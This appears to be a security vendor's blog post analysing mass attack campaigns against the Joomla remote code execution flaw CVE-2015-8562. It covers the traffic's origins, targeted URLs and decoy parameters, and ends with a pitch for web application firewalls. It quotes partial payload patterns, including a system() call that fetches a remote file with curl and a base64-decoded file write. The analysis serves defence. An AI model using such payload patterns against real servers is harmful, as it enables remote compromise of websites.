Back in 2014, we had predicted (for 2015) that most enterprises would mostly lose their battle against the endless number of patches required for their servers due to the exploding number of CVEs. 2015 indeed has been a record year for the number of CVEs disclosed and the number of patches delivered. Just last week, we highlighted in a blog showing how SecureSphere WAF Virtual Patching is protecting applications in the wild. It is vacation time with most folks out enjoying time off, but CVEs and bad actors don’t take any vacations, so we are back here to mention some of the key findings on the latest Joomla CVE.CVE-2015-8562 was yet another RCE (remote command execution) vulnerability that resulted in widespread blind scanning attacks similar to that of shellshock.
On December 14th, 2015, the Joomla community had released a new version (3.4.6), including the high priority security fix for a remote command execution vulnerability CVE-2015-8562.
Interestingly, our generic anomaly detection mechanisms spotted first attack attempts as early as December 10th – four days before the public release of the security fix.
A couple of hours after the publication of the fix Imperva/ Incapsula updated Web Application Firewalls with custom mitigation to automatically detect and block attacks trying to exploit this vulnerability. Minutes after placing the new mitigation, our WAF devices had started identifying and blocking massive attack traffic from a large number of IP addresses. We collected attack campaigns during several days and analyzed it, looking for the regular stuff – attack patterns, distribution of attack origins, attack velocity, and other attack characteristics. We reached two fascinating conclusions about the nature of these campaigns:
- “Blind” Attacks – a mere 10% of the 8,000 hosts under attack were using Joomla, meaning that a vast majority of the attacks targeted non-vulnerable servers (not Joomla) and weren’t likely to succeed. This fact confirms our latest findings of our 2015 WAAR.
- Botnet Attacks – The attacks originated from 11,000 origin IPs, indicating that at least part of the attack campaigns were using botnets. Furthermore, we have precisely identified attacks from IPs belonging to an active botnet we detected and classified several months ago.
More interesting facts about these attacks, which can be effective in building mitigation for these attacks:
- Preferred method of attack is POST
- Top attacked URLs (~70%) are those usually used in typical Joomla deployments – “/home”, “/index.php”, “/joomla”, “/contact”
- In addition to the payload in the headers, part of the attack vector was embedded in many fake parameters. Top five parameter names we’ve seen were, j00mla, Sf, fEdO, xUn, PCXZ
- The portion of reconnaissance vectors was fairly low, only 12% of the 32,000 attack attempts we’ve seen, using PHP functions such as “echo”, “print” and “die”.
- The other 88% were actual attacks, in most of the cases, masked with standard obfuscation measures, aimed at bypassing basic monitoring radars. Some examples:
- Top attack payload patterns include
- file_put_contents(…) + base64_decode(…)
- system(…; curl -O http://…; …)
- The attacks are highly distributed, originating from actually anywhere on the planet (see map below). However, as was stated in the 2015 WAAR report, United States is the leader in the number of attacking IPs, with 58% of the IPs residing in the US.
- Top attack payload patterns include
There are two main takeaways from this Joomla attack campaign.
1) If you have any web presence, it is not a question of whether or not you will face attacks, but a question of when and how. You will get scanned with attack vectors both blind and targeted ones, and some of these vectors will get through if adequate security measures are not put in place right away.
2) The second takeaway stems from the short time (actually no time…) that exists between the publication of a vulnerability and time we see it in the wild. It is crucial to choose security products that have zero-day mitigation techniques as well as a research team that continuously monitors new attacks and updates the product. While it is practically impossible to deploy new versions/patches in production environments so fast, we have seen attackers becoming agiler than ever and adapting with new attacks of increasing amplitude.